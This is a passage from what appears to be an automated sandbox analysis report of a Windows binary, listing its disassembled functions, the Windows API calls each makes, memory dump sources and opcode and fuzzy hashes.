                                                • Instruction Fuzzy Hash: 63419274640200EFEB10AF24DC8AF7A77E99F48B50F54C018FA5D9B2D2DB789C008B55
                                                APIs
                                                • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,007FF910), ref: 007E65BD
                                                • _strlen.LIBCMT ref: 007E65EF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID:
                                                • API String ID: 4218353326-0
                                                • Opcode ID: fe38efbdad69d20dcddd5aa4a93d22d7900c18dbd7d38fcaa4e22070ed49b8f7
                                                • Instruction ID: b016981f02c8f71a942c2f4ed37ab01dd486ab6cb41a39b9dae45a0cd948003d
                                                • Opcode Fuzzy Hash: fe38efbdad69d20dcddd5aa4a93d22d7900c18dbd7d38fcaa4e22070ed49b8f7
                                                • Instruction Fuzzy Hash: 1441C371A01104EFCF14EB65DCD9EBEB3A9EF58390F148169F51997292EB38AD00CB51
                                                APIs
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007DB92A
                                                • GetLastError.KERNEL32(?,00000000), ref: 007DB950
                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007DB975
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007DB9A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                • String ID:
                                                • API String ID: 3321077145-0
                                                • Opcode ID: ba7ab1b4d517887a83e37089d87057f05cdafc55a7c4b306b4e8bdae0412001a
                                                • Instruction ID: 2a6fb21677fa011375bec8dc4c44396be55d9639c70a963b794976e2497a9918
                                                • Opcode Fuzzy Hash: ba7ab1b4d517887a83e37089d87057f05cdafc55a7c4b306b4e8bdae0412001a
                                                • Instruction Fuzzy Hash: 32414B39600650DFCF10DF15C488A69BBF5AF89320B09C099EA4A9B362CB38FD01CB95
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007F8910
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: 99aa71d57d4527b84e0a9ecb8c8c6c96ae2bc14b86384a3563471444c711c3cf
                                                • Instruction ID: a5b1b3f66e809cdf93fd49b70c4818186b6e33bbf60134548a016351dab867e5
                                                • Opcode Fuzzy Hash: 99aa71d57d4527b84e0a9ecb8c8c6c96ae2bc14b86384a3563471444c711c3cf
                                                • Instruction Fuzzy Hash: 5B31AB3060110CBEEFA0DB58CC49BB937A5BB06360F544525FB51EA3A1CEB8B9809A53
                                                APIs
                                                • ClientToScreen.USER32(?,?), ref: 007FAB92
                                                • GetWindowRect.USER32(?,?), ref: 007FAC08
                                                • PtInRect.USER32(?,?,007FC07E), ref: 007FAC18
                                                • MessageBeep.USER32(00000000), ref: 007FAC89
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
                                                • Opcode ID: 88f6d5a76c135dd02eff6911a5d037bda9dfec20ad84dad4f02cd5766bbbd413
                                                • Instruction ID: b96290a66da531e32b6776c378294f66c0bc2959a5d7f338c78bc113c362beb2
                                                • Opcode Fuzzy Hash: 88f6d5a76c135dd02eff6911a5d037bda9dfec20ad84dad4f02cd5766bbbd413
                                                • Instruction Fuzzy Hash: CC415CB0600219EFCF11CF58C884A797BF5FF48710F1485A9EA189B361D738E945CB62
                                                APIs
                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007D0E58
                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 007D0E74
                                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007D0EDA
                                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007D0F2C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: c7eb9c9c882f9d9746a553ff555785e3809465a74fc6363e73a9ae0138cace45
                                                • Instruction ID: 5b331dd3c05a3fd3d21f57e495b4b520a68e2debc0841cf9438aa2ea32d978cd
                                                • Opcode Fuzzy Hash: c7eb9c9c882f9d9746a553ff555785e3809465a74fc6363e73a9ae0138cace45
                                                • Instruction Fuzzy Hash: 6A313730940218AEFB30DB258809BFABB75EF88310F18561BF0D0523D1C77D895597E5
                                                APIs
                                                • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 007D0F97
                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 007D0FB3
                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 007D1012
                                                • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 007D1064
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: 2d6944e82dc9100c2c89461a0939905dc819a593f75672c669fe74f42c8f1a9e
                                                • Instruction ID: 9180908334c65eb0ff42345093c6e325a6cb2e18fc1840b0bc8492f1ecd384d5
                                                • Opcode Fuzzy Hash: 2d6944e82dc9100c2c89461a0939905dc819a593f75672c669fe74f42c8f1a9e
                                                • Instruction Fuzzy Hash: AA313830A40288FEFF349B25C808BFABBB5AF49311F54421BE495923D1C77C89D197A1
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007A637B
                                                • __isleadbyte_l.LIBCMT ref: 007A63A9
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007A63D7
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007A640D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 36cc5d23c4bb4c45b076e62ca240596b23604dd9f1253f8bfe85069797b6c18d
                                                • Instruction ID: 11ff0882fb4d018940fb12aec49884da8c6bac94dda66a3795c56cc0fea5f4bb
                                                • Opcode Fuzzy Hash: 36cc5d23c4bb4c45b076e62ca240596b23604dd9f1253f8bfe85069797b6c18d
                                                • Instruction Fuzzy Hash: 6731AF31600286EFDF218F75C884ABA7BA5FF86310F194229F8248B191EB39D951DB50
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 007F4F6B
                                                  • Part of subcall function 007D3685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007D369F
                                                  • Part of subcall function 007D3685: GetCurrentThreadId.KERNEL32 ref: 007D36A6
                                                  • Part of subcall function 007D3685: AttachThreadInput.USER32(00000000,?,007D50AC), ref: 007D36AD
                                                • GetCaretPos.USER32(?), ref: 007F4F7C
                                                • ClientToScreen.USER32(00000000,?), ref: 007F4FB7
                                                • GetForegroundWindow.USER32 ref: 007F4FBD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: 7fd2ab64f5d362bbd20bf112156533ce3faadebb14364ed99bd312bda72854b0
                                                • Instruction ID: b44a86709ed8a68f8851f6ed7eba188c804a9db04980adb0e31ad7e92235dc96
                                                • Opcode Fuzzy Hash: 7fd2ab64f5d362bbd20bf112156533ce3faadebb14364ed99bd312bda72854b0
                                                • Instruction Fuzzy Hash: E6313071901108AFDB00EFA5C8899EFB7F9EF88300F11806AE505E7251EA799E45CBA1
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 007D3CBE
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 007D3CCC
                                                • Process32NextW.KERNEL32(00000000,?), ref: 007D3CEC
                                                • CloseHandle.KERNEL32(00000000), ref: 007D3D96
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 420147892-0
                                                • Opcode ID: 0ca781aa389cc831e4995127c96b6e122e914bf93eb7d58e427b7232c30c8ccd
                                                • Instruction ID: f2850831c3122221af40930a1b401edd25a6b10178a381cd86082019cad65487
                                                • Opcode Fuzzy Hash: 0ca781aa389cc831e4995127c96b6e122e914bf93eb7d58e427b7232c30c8ccd
                                                • Instruction Fuzzy Hash: 2C31B471108305DFD704EF10C885AAFBBF8EF95394F14492EF585862A1EB789A49CB93
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • GetCursorPos.USER32(?), ref: 007FC53C
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007ABB2B,?,?,?,?,?), ref: 007FC551
                                                • GetCursorPos.USER32(?), ref: 007FC59E
                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007ABB2B,?,?,?), ref: 007FC5D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                • String ID:
                                                • API String ID: 2864067406-0
                                                • Opcode ID: a808366b9f2186c550a42b4323ab5fd3977e1ca96f5ec4873463f7f9abd21dd9
                                                • Instruction ID: 5076baa0169c1942fb12102ec2f4bf30e49ac85f51add017991b8e612e4ceef7
                                                • Opcode Fuzzy Hash: a808366b9f2186c550a42b4323ab5fd3977e1ca96f5ec4873463f7f9abd21dd9
                                                • Instruction Fuzzy Hash: 9331733660041CEFCB16CF68C958EBA7BB5FF49310F144465FA058B261D739AD61DBA0
                                                APIs
                                                  • Part of subcall function 007C8432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C8449
                                                  • Part of subcall function 007C8432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C8453
                                                  • Part of subcall function 007C8432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8462
                                                  • Part of subcall function 007C8432: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8469
                                                  • Part of subcall function 007C8432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C847F
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007C89CB
                                                • _memcmp.LIBCMT ref: 007C89EE
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C8A24
                                                • HeapFree.KERNEL32(00000000), ref: 007C8A2B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                • String ID:
                                                • API String ID: 1592001646-0
                                                • Opcode ID: 3b80ca58265c8a9670111c0354a3f3f80a21db85b64a87937fa76fb273b6ec18
                                                • Instruction ID: 78f706e932065a2bd5a719af150e3bb97c4dd6967c72e8a2719215c9041383db
                                                • Opcode Fuzzy Hash: 3b80ca58265c8a9670111c0354a3f3f80a21db85b64a87937fa76fb273b6ec18
                                                • Instruction Fuzzy Hash: 6D216972E40109EBDF10DFA4C949FAEB7B8EF44355F15805EE854A7241EB38AA05CB52
                                                APIs
                                                • __setmode.LIBCMT ref: 00790B2E
                                                  • Part of subcall function 00775B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D793F,?,?,00000000), ref: 00775B8C
                                                  • Part of subcall function 00775B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D793F,?,?,00000000,?,?), ref: 00775BB0
                                                • _fprintf.LIBCMT ref: 00790B65
                                                • OutputDebugStringW.KERNEL32(?), ref: 007C6111
                                                  • Part of subcall function 00794C1A: _flsall.LIBCMT ref: 00794C33
                                                • __setmode.LIBCMT ref: 00790B9A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                • String ID:
                                                • API String ID: 521402451-0
                                                • Opcode ID: b3e36eef11fd9353a78fbddbf64c9f01ca6e78e73018568d6001206f3cd42481
                                                • Instruction ID: abbb87fd50dcc12ea78e37cb6297d8fd14ee4f02dc2384c43aecf841ad0d6f1c
                                                • Opcode Fuzzy Hash: b3e36eef11fd9353a78fbddbf64c9f01ca6e78e73018568d6001206f3cd42481
                                                • Instruction Fuzzy Hash: 8E110A72904204FEDF05B7B4BC8ADBE7B6DEF81320F14415AF118A7292DE6D584247E5
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007E18B9
                                                  • Part of subcall function 007E1943: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007E1962
                                                  • Part of subcall function 007E1943: InternetCloseHandle.WININET(00000000), ref: 007E19FF
                                                Similarity
                                                • API ID: Internet$CloseConnectHandleOpen
                                                • String ID:
                                                • API String ID: 1463438336-0
                                                • Opcode ID: cc59ad592fa6a690cde94c9a9b9885acfb5d9f78ee215c6a992271a831b3ac65
                                                • Instruction ID: b72f7821b5d16646ec6c6cb131c3eb100eb09cd2b3ddce6b0968df65ed3e4a9c
                                                • Opcode Fuzzy Hash: cc59ad592fa6a690cde94c9a9b9885acfb5d9f78ee215c6a992271a831b3ac65
                                                • Instruction Fuzzy Hash: 12210431202685FFDB119F628C12F7AB7ADFF4C700F50402AFA1596251CB39E821D760
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,007FFAC0), ref: 007D3AA8
                                                • GetLastError.KERNEL32 ref: 007D3AB7
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 007D3AC6
                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007FFAC0), ref: 007D3B23
                                                Similarity
                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                • String ID:
                                                • API String ID: 2267087916-0
                                                • Opcode ID: a246e2594bc0259de5637951fe18ade04e0990c8fe59302df2f6a2ea9e9437be
                                                • Instruction ID: 441808349b9010fa985f410378594dabcf389c515b4308a71bdb410a3085e887
                                                • Opcode Fuzzy Hash: a246e2594bc0259de5637951fe18ade04e0990c8fe59302df2f6a2ea9e9437be
                                                • Instruction Fuzzy Hash: B72160705082059F8710DF28D88486AB7F8EF55768F148A6BF499C73A1DB38DE45CB87
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EC), ref: 007F5DE9
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007F5E03
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007F5E11
                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007F5E1F
                                                Similarity
                                                • API ID: Window$Long$AttributesLayered
                                                • String ID:
                                                • API String ID: 2169480361-0
                                                • Opcode ID: 67f201f4d8b4f4e70fabcd7747b155de117b1663571eaca01477f01b3c832658
                                                • Instruction ID: 49031e2d71fcd74237c7034c83c8ef85ac248cca89b803477936349a7720566e
                                                • Opcode Fuzzy Hash: 67f201f4d8b4f4e70fabcd7747b155de117b1663571eaca01477f01b3c832658
                                                • Instruction Fuzzy Hash: 2D11D331305914AFDB14AB24CC49FBA7799EF85320F148119FB1ADB3E2CB68AD00CB94
                                                APIs
                                                • _free.LIBCMT ref: 007A5281
                                                  • Part of subcall function 0079588C: __FF_MSGBANNER.LIBCMT ref: 007958A3
                                                  • Part of subcall function 0079588C: __NMSG_WRITE.LIBCMT ref: 007958AA
                                                  • Part of subcall function 0079588C: RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,00000000,?,?,?,00790F53,?), ref: 007958CF
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: b4bf6c5efaadb27562f4c555ff65c0d2faab3ac1b574b66b1695429cf4fcdbd1
                                                • Instruction ID: be9b0a12ae474fbd4ecb49359a8560504d9485c1a2f79403e7f8eeac87c95000
                                                • Opcode Fuzzy Hash: b4bf6c5efaadb27562f4c555ff65c0d2faab3ac1b574b66b1695429cf4fcdbd1
                                                • Instruction Fuzzy Hash: 7D11A773506A15EBDF213F70BC0976E3798BF87361B204A39F905DA291DE3C89408765
                                                APIs
                                                • _memset.LIBCMT ref: 00774560
                                                  • Part of subcall function 0077410D: _memset.LIBCMT ref: 0077418D
                                                  • Part of subcall function 0077410D: _wcscpy.LIBCMT ref: 007741E1
                                                  • Part of subcall function 0077410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007741F1
                                                • KillTimer.USER32(?,00000001,?,?), ref: 007745B5
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007745C4
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007AD5FE
                                                Similarity
                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                • String ID:
                                                • API String ID: 1378193009-0
                                                • Opcode ID: 0fff45439af37689553ea460439cf63798dd1f95e890700fe0da83003872ea96
                                                • Instruction ID: 89bcaea6e939bbb7b23397c97fd033dfd456a8b5548f8f9021f413dc74439a9a
                                                • Opcode Fuzzy Hash: 0fff45439af37689553ea460439cf63798dd1f95e890700fe0da83003872ea96
                                                • Instruction Fuzzy Hash: 112126B0904784AFEF328B24C859BE7BBECAF42308F04409EE69E56241D7785E94CB51
                                                APIs
                                                  • Part of subcall function 00775B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D793F,?,?,00000000), ref: 00775B8C
                                                  • Part of subcall function 00775B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D793F,?,?,00000000,?,?), ref: 00775BB0
                                                • gethostbyname.WSOCK32(?,?,?), ref: 007E64AF
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E64BA
                                                • _memmove.LIBCMT ref: 007E64E7
                                                • inet_ntoa.WSOCK32(?), ref: 007E64F2
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                • String ID:
                                                • API String ID: 1504782959-0
                                                • Opcode ID: a9b8568c7ae93e87f3b2b5f1e486cd9d38eb08429d4e772edd69d3bc179bc2a2
                                                • Instruction ID: 01d7e24743ba1f678bf7e3920d5da8b2dc635acd832eac7f79a10633b064273a
                                                • Opcode Fuzzy Hash: a9b8568c7ae93e87f3b2b5f1e486cd9d38eb08429d4e772edd69d3bc179bc2a2
                                                • Instruction Fuzzy Hash: 47115171900508EFCF04EBA4DD8ADAE77B9AF18350B148165F606A7261DF78AE14CB61
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007C8E23
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C8E35
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C8E4B
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C8E66
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 447d9a743dcafb61bc28c2858f12661bc1092cf75db90b412c357d37a203f695
                                                • Instruction ID: ee885f44ea6deb33d47fba7b93110abeb7ef7705f0f6dc37682f840121397783
                                                • Opcode Fuzzy Hash: 447d9a743dcafb61bc28c2858f12661bc1092cf75db90b412c357d37a203f695
                                                • Instruction Fuzzy Hash: 8A111879901218FFEB11DFA5C885FADBBB8FF48710F204199E904B7290DA716E10DB94
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • DefDlgProcW.USER32(?,00000020,?), ref: 007712D8
                                                • GetClientRect.USER32(?,?), ref: 007AB77B
                                                • GetCursorPos.USER32(?), ref: 007AB785
                                                • ScreenToClient.USER32(?,?), ref: 007AB790
                                                Similarity
                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                • String ID:
                                                • API String ID: 4127811313-0
                                                • Opcode ID: ec209892661de93b06ae54520e915311cd314b2655d7431b6c8c59db75cc574c
                                                • Instruction ID: 77e72dc9162bac59668095c0049970453615cc2ae3c92ea9ab09509554b2d711
                                                • Opcode Fuzzy Hash: ec209892661de93b06ae54520e915311cd314b2655d7431b6c8c59db75cc574c
                                                • Instruction Fuzzy Hash: F3112B35A00119EBCF10DF98D8899BE77B8FF45340F408456FA05E7251CB38AA55DBA9
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007D001E,?,007D1071,?,00008000), ref: 007D1490
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,007D001E,?,007D1071,?,00008000), ref: 007D14B5
